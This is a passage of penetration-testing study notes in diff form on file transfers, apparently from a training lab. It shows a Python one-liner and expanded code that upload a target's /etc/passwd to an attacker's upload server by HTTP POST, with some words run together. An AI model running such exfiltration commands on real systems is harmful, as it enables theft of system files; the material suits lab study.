5 File Transfers

 - Tool:

-module for HTTP POST requests. - Setup: Start
+requestsmodule for HTTP POST requests. - Setup: Start

-on Pwnbox:python3 -m uploadserver # Serves on 0.0.0.0:8000
+uploadserveron Pwnbox:python3 -m uploadserver # Serves on 0.0.0.0:8000 - One-liner:

-python3 -c 'import requests; requests.post("http://192.168.49.128:8000/upload", files={"files": open("/etc/passwd", "rb")})'
+python3 -c 'import requests; requests.post("http://192.168.49.128:8000/upload", files={"files": open("/etc/passwd", "rb")})' - Expanded Code:

-import requests URL = "http://192.168.49.128:8000/upload" file = open("/etc/passwd", "rb") r = requests.post(URL, files={"files": file})
+import requests URL = "http://192.168.49.128:8000/upload" file = open("/etc/passwd", "rb") r = requests.post(URL, files={"files": file}) - Note: Adaptable to other languages by building similar upload logic.

 Notes on Miscellaneous File Transfer Methods